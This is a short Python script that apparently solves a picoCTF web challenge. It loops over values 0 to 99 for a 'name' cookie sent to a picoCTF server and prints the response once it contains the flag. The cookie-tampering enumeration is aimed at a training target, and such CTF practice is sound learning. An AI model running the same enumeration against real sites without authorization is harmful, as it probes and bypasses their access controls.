#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3Packages.requests
# coding: utf-8

import json

import requests

BASE_URL = "http://mercury.picoctf.net:6418/check"

def main():
    for n in range(100):
        r = requests.get(
            BASE_URL,
            cookies = {
                'name': str(n),
            },
        )

        print(r)
        if "pico" in r.text:
            print(r.text)
            break
        # print(r.text.split('\n')[41])

if __name__ == '__main__':
    main()

